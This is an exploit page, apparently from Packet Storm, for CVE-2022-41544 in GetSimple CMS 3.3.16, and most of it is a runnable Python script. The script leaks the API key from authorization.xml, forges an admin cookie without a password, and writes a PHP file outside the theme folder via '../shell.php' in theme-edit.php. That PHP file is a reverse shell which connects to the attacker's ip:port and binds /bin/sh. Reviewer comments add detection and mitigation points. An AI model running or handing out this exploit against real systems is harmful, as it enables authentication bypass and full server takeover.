

GetSimple CMS 3.3.16 Shell Upload

GetSimple CMS version 3.3.16 suffers from a remote shell upload vulnerability.

Packet Storm
# Exploit Title: GetSimple CMS v3.3.16 - Remote Code Execution (RCE)
# Date: 18/5/2023
# Exploit Author : Youssef Muhammad
# Vendor: Get-simple
# Software Link:
# Version app: 3.3.16
# Tested on: linux
# CVE: CVE-2022-41544
#
# Reviewer notes -- what this PoC depends on, as read from the code below:
#   1. admin/index.php exposes the installed version in a script URL
#      (get_version).
#   2. data/other/authorization.xml is fetched over plain HTTP and its
#      first element is used as the API key (api_leak); the chain stops
#      if the web server refuses that request.
#   3. An admin cookie is derived from version + apikey + username only
#      (set_cookies); no password is involved anywhere in this script.
#   4. admin/theme-edit.php is POSTed with edited_file='../shell.php', so
#      the submitted content is written outside the theme directory
#      (upload_shell) -- the edited_file flaw tracked as CVE-2022-41544.
#   5. <path>/shell.php is requested once (shell_trigger); the PHP it
#      contains opens an outbound connection from the web server to the
#      <ip:port> given on the command line.
# Detection and mitigation points follow the same list: deny web access
# to the data/ tree and alert on requests for authorization.xml; alert on
# POSTs to admin/theme-edit.php whose edited_file contains "..";
# watch for new .php files at the CMS root and for the PHP worker
# spawning /bin/sh or opening unexpected outbound connections.

import sys
import hashlib
import re
import requests
from xml.etree import ElementTree
from threading import Thread   # unused in this script
import telnetlib               # unused in this script

# ANSI colour codes for console output.
purple = "\033[0;35m"
reset = "\033[0m"
yellow = "\033[93m"
blue = "\033[34m"
red = "\033[0;31m"


def print_the_banner():
    """Print the ASCII-art banner (cosmetic only)."""
    print(purple + ''' CCC V     V EEEE      22   000   22   22      4  4  11  5555 4  4 4  4 C    V     V E        2  2 0  00 2  2 2  2     4  4 111  5    4  4 4  4 C     V   V  EEE  ---   2  0 0 0   2    2  --- 4444  11  555  4444 4444 C      V V   E         2   00  0  2    2          4  11     5    4    4  CCC    V    EEEE     2222  000  2222 2222        4 11l1 555     4    4  '''+ reset)


def get_version(target, path):
    """Read the CMS version from the admin login page.

    The version is taken from the ``jquery.getsimple.js?v=`` query string
    embedded in admin/index.php. Returns the version string, or None when
    the page does not contain it. The printed "vulnerable" verdict comes
    from a plain string comparison, not a numeric version compare; the
    version is returned either way.
    """
    r = requests.get(f"http://{target}{path}admin/index.php")
    match = re.search("jquery.getsimple.js\?v=(.*)\"", r.text)
    if match:
        version = match.group(1)
        # lexicographic compare; only affects the message, not the return
        if version <= "3.3.16":
            print( red + f"[+] the version {version} is vulnrable to CVE-2022-41544")
        else:
            print ("This is not vulnrable to this CVE")
        return version
    return None


def api_leak(target, path):
    """Fetch data/other/authorization.xml and return its first element's text.

    This is the step a hardened install breaks: the chain only continues
    when the web server serves this file (``r.ok``, i.e. status < 400).
    Denying web access to the data/ tree, and alerting on requests for
    this path, covers it. Returns the apikey text, or None on a failed
    request.
    """
    r = requests.get(f"http://{target}{path}data/other/authorization.xml")
    if r.ok:
        tree = ElementTree.fromstring(r.content)
        # first child element of the document root is taken as the key
        apikey = tree[0].text
        print(f"[+] apikey obtained {apikey}")
        return apikey
    return None


def set_cookies(username, version, apikey):
    """Build request headers carrying a forged GS_ADMIN session cookie.

    As implemented here, cookie name = sha1("getsimple_cookie_" + version
    without dots + apikey) and cookie value = sha1(username + apikey). The
    only secret in that derivation is the apikey returned by api_leak(),
    which is why that file must not be web-readable. Whether the CMS
    accepts exactly this derivation is not visible here -- confirm
    against the CMS source.
    """
    cookie_name = hashlib.sha1(f"getsimple_cookie_{version.replace('.', '')}{apikey}".encode()).hexdigest()
    cookie_value = hashlib.sha1(f"{username}{apikey}".encode()).hexdigest()
    cookies = f"GS_ADMIN_USERNAME={username};{cookie_name}={cookie_value}"
    headers = {
        'Content-Type':'application/x-www-form-urlencoded',
        'Cookie': cookies
    }
    return headers


def get_csrf_token(target, path, headers):
    """Return the anti-CSRF nonce from admin/theme-edit.php, or None.

    The page is requested with the forged cookie from set_cookies();
    presumably a nonce is only present when the server treats that cookie
    as an admin session, so a None here is the first sign the cookie was
    rejected -- confirm against the CMS login handling.
    """
    r = requests.get(f"http://{target}{path}admin/theme-edit.php", headers=headers)
    m = re.search('nonce" type="hidden" value="(.*)"', r.text)
    if m:
        print("[+] csrf token obtained")
        return m.group(1)
    return None


def upload_shell(target, path, headers, nonce, shell_content):
    """POST shell_content to admin/theme-edit.php with a traversing edited_file.

    edited_file is '../shell.php', a relative path that leaves the theme
    directory; the server-side save accepting it is the edited_file flaw
    behind CVE-2022-41544. Only the HTTP status is checked, so "uploaded
    successfully" means a 200 response, not a verified write. Server-side
    validation of edited_file against the theme directory is the fix; a
    POST to this URL with ".." in edited_file is the log indicator.
    """
    upload_url = f"http://{target}{path}admin/theme-edit.php?updated=true"
    payload = {
        'content': shell_content,
        'edited_file': '../shell.php',
        'nonce': nonce,
        'submitsave': 1
    }
    try:
        response = requests.post(upload_url, headers=headers, data=payload)
        if response.status_code == 200:
            print("[+] Shell uploaded successfully!")
        else:
            print("(-) Shell upload failed!")
    except requests.exceptions.RequestException as e:
        print("(-) An error occurred while uploading the shell:", e)


def shell_trigger(target, path):
    """Request <path>/shell.php once so the written PHP executes.

    Executing that file is what opens the outbound connection described
    in main(). A 200 response is reported as success; request errors are
    printed rather than raised.
    """
    url = f"http://{target}{path}/shell.php"
    try:
        response = requests.get(url)
        if response.status_code == 200:
            print("[+] Webshell trigged successfully!")
        else:
            print("(-) Failed to visit the page!")
    except requests.exceptions.RequestException as e:
        print("(-) An error occurred while visiting the page:", e)


def main():
    """Run the chain: version -> apikey -> cookie -> nonce -> upload -> trigger.

    Argv: <target> <path> <ip:port> <username>; ``path`` is normalised to
    end with '/'. shell_content is a PHP snippet that connects to ip:port
    and attaches /bin/sh to that socket, so a successful run shows up on
    the server as the PHP worker spawning /bin/sh and the web host opening
    an outbound connection -- both are sound alert conditions on a CMS
    host. Each step returns early with a "(-)" message when it fails.
    """
    if len(sys.argv) != 5:
        print("Usage: python3 CVE-2022-41544.py <target> <path> <ip:port> <username>")
        return
    target = sys.argv[1]
    path = sys.argv[2]
    if not path.endswith('/'):
        path += '/'
    ip, port = sys.argv[3].split(':')
    username = sys.argv[4]
    # PHP payload written to the server by upload_shell(); connect-back
    # to ip:port with /bin/sh bound to the socket.
    shell_content = f"""<?php    $ip = '{ip}';    $port = {port};    $sock = fsockopen($ip, $port);    $proc = proc_open('/bin/sh', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);    """
    version = get_version(target, path)
    if not version:
        print("(-) could not get version")
        return
    apikey = api_leak(target, path)
    if not apikey:
        print("(-) could not get apikey")
        return
    headers = set_cookies(username, version, apikey)
    nonce = get_csrf_token(target, path, headers)
    if not nonce:
        print("(-) could not get nonce")
        return
    upload_shell(target, path, headers, nonce, shell_content)
    shell_trigger(target, path)


if __name__ == '__main__':
    print_the_banner()
    main()

Related news

CVE-2022-41544: Remote command execution vulnerability in 3.3.16 · Issue #1352 · GetSimpleCMS/GetSimpleCMS

GetSimple CMS v3.3.16 was discovered to contain a remote code execution (RCE) vulnerability via the edited_file parameter in admin/theme-edit.php.
